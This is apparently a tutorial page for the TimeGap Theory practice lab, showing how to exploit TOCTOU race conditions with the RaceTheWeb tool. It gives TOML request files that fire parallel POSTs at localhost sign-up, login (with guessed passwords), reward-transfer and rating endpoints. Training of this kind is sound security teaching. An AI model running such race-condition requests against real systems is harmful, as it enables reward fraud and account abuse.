More Tools

Start with whatever tools you may have.Better tools will be found as you go.

Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world:
Name
Notes
Browser Dev Tools
Very easy to find
Comes with major browsers
Does not support sending cookies
cURL
Easy to get
Works on almost all the platforms
Supports sending cookies
​https://curl.haxx.se/​
We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from https://github.com/aaronhnatiw/race-the-web/releases​
Which version to download? It depends on the operating-system you are running
Operating System
FIle to be downloaded
Linux 32-bit
race-the-web_2.0.1_lin32.bin
Linux 64-bit
race-the-web_2.0.1_lin64.bin
macOS 32-bit
race-the-web_2.0.1_osx32.app.zip
macOS 64-bit
race-the-web_2.0.1_osx64.app.zip
Windows 32-bit
race-the-web_2.0.1_win32.exe
Windows 64-bit
race-the-web_2.0.1_win64.exe
On Linux and macOS machines, you need to make the file executable.
Operating System
Command to run on Terminal
race-the-web_2.0.1_lin32.bin
chmod +x race-the-web_2.0.1_lin32.bin
race-the-web_2.0.1_lin64.bin
chmod +x race-the-web_2.0.1_lin64.bin
race-the-web_2.0.1_osx32.app.zip
Extract the zip file
chmod +x race-the-web_2.0.1_osx32.app
race-the-web_2.0.1_osx64.app.zip
Extract the zip file
chmod +x race-the-web_2.0.1_osx64.app
Running RacetheWeb is easy:
1.Open command prompt/Terminal
2.Navigate to the directory where you have extracted/downloaded the executable binary file
3.Run the following command:
A screenshot of a social media post

Description automatically generated
race-the-web portion:
Depending on the operating-system you are using, the race-the-web portion needs to be changed.
Operating System
race-the-web portion
Linux 32-bit
./race-the-web_2.0.1_lin32.bin
Linux 64-bit
./race-the-web_2.0.1_lin64.bin
macOS 32-bit
./race-the-web_2.0.1_osx32.app
macOS 64-bit
./race-the-web_2.0.1_osx64.app
Windows 32-bit
race-the-web_2.0.1_win32.exe
Windows 64-bit
race-the-web_2.0.1_win64.exe
<toml-file> portion:
TOML stands for Tom’s Obvious Minimal Language. The TOML file supplied should be having the request details so that race-the-web can run them.
Find TOML file for some of the TimeGap Theory challenges below:
Sign Up page
# Sign Up
​
count = 10
verbose = false
​
[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/sign-up.php"
   body = "firstname=tom&password=tom&email=tom%40example.com&rewards=100"
​
In the above TOML file:
Count defines how many requests RaceTheWeb tools would be sending in parallel
Verbose defines the verbosity level of output that is displayed on the screen. The value of this can either be true or false
Method defines the type of the request. This can be GET, POST, PUT, DELETE etc.
URL is, well, the url at which request needs to be sent
Body of the request. You can skip this part if there is no body that needs to be submitted
Sign In page
# Sign In Page
​
count = 1
verbose = true
​
[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=1234&submit=Submit"
​
[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=password&submit=Submit"
​
[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=tom&submit=Submit"
​
In the above TOML file:
Count is 1. However, there are three requests in the file. As such, RaceTheWeb tool will send three parallel requests
First two requests have wrong password in the request body
Transfer rewards page
# Transfer Rewards
​
count = 10
verbose = false
​
[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php"
   body = "from=tom%40sechow.com&to=jerry%40sechow.com&amount=100&submit=Submit"
​
Ratings page
# Ratings page
​
count = 1
verbose = false
​
[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
   body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3"
   cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"]
​
[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
   body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5"
   cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"]
​
In the above TOML file, we are sending a cookie as well.
Now you know:
1.Various open-source tools and techniques for finding and exploiting TOCTOU security issues
2.How to use RaceTheWeb tool for exploiting TOCTOU security issues
3.Writing TOML files for RaceTheWeb tool

Challenge 7 – Ratings

Credits

Last modified 2yr ago

Name	Notes
Browser Dev Tools	Very easy to find Comes with major browsers Does not support sending cookies
cURL	Easy to get Works on almost all the platforms Supports sending cookies https://curl.haxx.se/

Operating System	FIle to be downloaded
Linux 32-bit	race-the-web_2.0.1_lin32.bin
Linux 64-bit	race-the-web_2.0.1_lin64.bin
macOS 32-bit	race-the-web_2.0.1_osx32.app.zip
macOS 64-bit	race-the-web_2.0.1_osx64.app.zip
Windows 32-bit	race-the-web_2.0.1_win32.exe
Windows 64-bit	race-the-web_2.0.1_win64.exe

Operating System	Command to run on Terminal
race-the-web_2.0.1_lin32.bin	chmod +x race-the-web_2.0.1_lin32.bin
race-the-web_2.0.1_lin64.bin	chmod +x race-the-web_2.0.1_lin64.bin
race-the-web_2.0.1_osx32.app.zip	Extract the zip file chmod +x race-the-web_2.0.1_osx32.app
race-the-web_2.0.1_osx64.app.zip	Extract the zip file chmod +x race-the-web_2.0.1_osx64.app

Operating System	race-the-web portion
Linux 32-bit	./race-the-web_2.0.1_lin32.bin
Linux 64-bit	./race-the-web_2.0.1_lin64.bin
macOS 32-bit	./race-the-web_2.0.1_osx32.app
macOS 64-bit	./race-the-web_2.0.1_osx64.app
Windows 32-bit	race-the-web_2.0.1_win32.exe
Windows 64-bit	race-the-web_2.0.1_win64.exe